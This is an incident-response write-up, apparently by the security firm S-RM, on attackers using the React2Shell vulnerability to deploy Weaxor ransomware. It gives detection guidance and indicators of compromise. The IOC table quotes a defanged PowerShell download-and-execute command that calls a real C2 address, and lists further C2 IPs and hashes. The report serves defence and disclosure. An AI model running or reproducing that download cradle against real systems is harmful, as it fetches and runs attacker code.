S-RM has responded to an incident where a threat actor used the recently disclosed critical vulnerability known as React2Shell (CVE-2025-55182) to gain access to a corporate network and deploy ransomware. The deployment of ransomware in S-RM’s cases appears to have been automated, and the scope of compromise remained limited to the server which was vulnerable to React2Shell.
This is the first time S-RM has observed this vulnerability being used by financially motivated threat actors to facilitate a cyber extortion attack, and highlights an escalation in the known impact of this vulnerability compared to other public reporting, which has so far primarily documented instances of the vulnerability being used to introduce backdoor malware or crypto miners.
This article describes how the threat actor rapidly went from initial access to ransomware deployment and shares technical guidance on what you can do to stay protected.
What is React2Shell?
React2Shell (CVE-2025-55182) is a maximum severity vulnerability in React Server Components (RSC) which was publicly disclosed on 3 December 2025. The vulnerability impacts the Flight Protocol, a core feature of the React web development library and the open-source framework Next.js, which is used to speed up web application rendering. The vulnerability allows an attacker to send a malicious HTTP request to trick the web server into running malicious code. Code is executed with the privileges of the user running the web server process, which could give a remote attacker highly privileged access to unpatched systems.
The vulnerability received a critical CVSS rating of 10.0 due to the ease of exploitation and the fact that many exposed systems are potentially at risk. The lack of authentication means it is also highly susceptible to automated attacks.
Which threat actors are exploiting React2Shell?
Initial reporting from AWS on 4 December indicated that nation-state actors were very quick to begin attempting to exploit the vulnerability, with malicious scanning activity beginning within hours of public disclosure. As the aim of these threat actors was likely espionage, observed post impact activity was limited to the installation of persistent backdoors into networks. Financially motivated threat actors were also quick to begin exploring the vulnerability for illicit crypto currency mining. In both cases, the threat actors aimed to evade detection and maintain persistent access to compromised systems.
S-RM has now observed one financially motivated threat actor use React2Shell as the initial access vector in a ransomware attack. This marks a shift from previously reported exploitation. It indicates threat actors whose modus operandi involves cyber extortion are also successfully exploiting this vulnerability, albeit on a much smaller scale and likely in an automated fashion.
What is Weaxor ransomware?
The specific ransomware payload we observed was a strain called Weaxor, which was first detected in late 2024. Weaxor is reported to be a rebrand of Mallox ransomware strain. Mallox was active from 2021 and associated with exploiting insecure Microsoft SQL servers.
Weaxor is not associated with a public ransomware-as-a-service (‘RaaS’) operation or dark web data leak site. Its predecessor Mallox did operate a RaaS platform but there's no definitive information about Weaxor having its own affiliate recruitment program separate from the Mallox ecosystem. Public reporting also indicates that ransom demands are relatively low. This suggests Weaxor may be used by less sophisticated actors focused on targeting public facing web servers.
React2Shell to Weaxor Attack Chain
Immediately after the threat actor gained access to our client’s network on 5 December 2025, they ran an obfuscated PowerShell command, which established command and control (C2) by downloading a Cobalt Strike PowerShell stager and installing a beacon that called back to their remote infrastructure. After this, the threat actor disabled real time protection on Windows Defender Antivirus to prepare the environment for secondary payloads.
The ransomware binary was dropped and executed on the system within less than one minute of initial access. Recovery notes titled "RECOVERY INFORMATION.txt" were created in multiple directories. Encrypted files were modified with the file extension “.weax”. After ransomware detonation, a text file was also created on disk which included the public IP address of the target. This was likely sent back to the threat actor’s C2 server. As a defence evasion tactic, event logs were cleared, and volume shadow copies were deleted.
We did not observe any evidence of attempted lateral movement to other systems beyond the vulnerable web server, and there was no evidence that data exfiltration was attempted. The speed between initial access and exploitation suggests that this was part of an automated campaign, although we did not observe any artefacts in the compromised environment which explicitly confirm this.
We also identified evidence that the same host was subsequently compromised by separate threat actors who deployed alternate C2 mechanisms over the course of the following day, before the server was taken offline and response activities commenced.
Lessons Learned
Ransomware deployment occurred just two days after the public disclosure of the React2Shell vulnerability. This highlights how quickly financially motivated threat actors now move to automate campaigns against critical vulnerabilities.
However, we have not yet seen evidence of more advanced actors in the ransomware ecosystem using this vulnerability to establish a foothold and then gain deeper access into victims’ networks.
Organisations running React Server Components should verify that they are running a fully patched version. On 11 December React warned that initially released patches were still vulnerable (19.0.2, 19.1.3, and 19.2.2) and warned all organisations running applications with React code on a server or running a bundler or framework supporting React Server Components to patch immediately.
Patching alone is not sufficient. Organisations should conduct a forensic review of any previously vulnerable internet-facing web servers to confirm whether they were compromised. This should involve checking for:
- Evidence of unusual outbound connections potentially indicative of C2
- Evidence of AV/endpoint protection disabling
- Evidence of log clearing/tampering
- Evidence of unusual spikes in resource usage indicative of crypto miners
- Our indicators of compromise (IOCs) set out below, and other public IOCs related to React2Shell exploitation
Detections and evidence of exploitation of React2Shell
In subsequent activity on the compromised web server after the ransomware deployment, we observed ‘cmd.exe’ and ‘powershell.exe’ processes being spawned from ‘node.exe’, the legitimate executable for Node.js. This was also followed by the ‘whoami’ command being run for discovery. This is a strong indicator of compromise for React2Shell exploitation. Defenders should review Windows event logs or EDR telemetry for any evidence of process creation from binaries related to Node or React. It is likely that earlier discovery activity around the time of initial access was obscured due to event log clearing associated with the ransomware deployment.
In the initial intrusion, there was limited direct evidence of exploitation of CVE-2025-55182, likely due to log clearing associated with the ransomware deployment. However, at around the time of initial access, the User Access Logs on the compromised web server recorded a ‘File Server’ connection from the local host (127.0.0.1), associated with the user account which ran the vulnerable process. Anomalous activity in this artefact is often a strong contextual indication of exploitation of a software vulnerability.
Indicators of Compromise
S-RM's team identified the following IOCs during the investigation:
Host-based IOCs
|
Indicator name |
Description |
SHA1 |
| weax.txt | File containing system information including the public IP address of the target | N/A |
| IEX (New-Object System[.]Net[.]Webclient). DownloadString('http[://]23[.] 235[.]188[.]3:[REDACTED]') |
Deobfuscated PowerShell command to download malicious payloads Unique reference redacted |
N/A |
| ZQyfcAJ.exe | Weaxor ransomware binary | f6083acf5fde12d17fb5b309824 2e92a48cbf122 |
| Agtisx.exe | Command and control (C2) payload likely from separate intrusion | 05f4407eb2e413c3babdc3054 e6db032cadc51b2 |
Network-based IOCs
|
IP address/domain |
Description |
|
23.235.188[.]3 |
C2 IP address used in Weaxor attack |
|
193.143.1[.]153 |
IP address the Weaxor ransomware connected to over port 80 |
|
45.221.113[.]96 |
C2 IP address associated with Agtisx.exe |
|
45.221.114[.]250 |
C2 IP address associated with Agtisx.exe |
|
43.156.70[.]172 |
C2 IP address associated with Agtisx.exe |
|
45.194.22[.]139 |
C2 IP address associated with Agtisx.exe |
|
38.47.103[.]117 |
C2 IP address associated with Agtisx.exe |
Please contact S-RM if you are concerned about your organisation’s exposure to this vulnerability.
-1-1.jpeg?width=121&height=121&name=MicrosoftTeams-image%20(11)-1-1.jpeg)
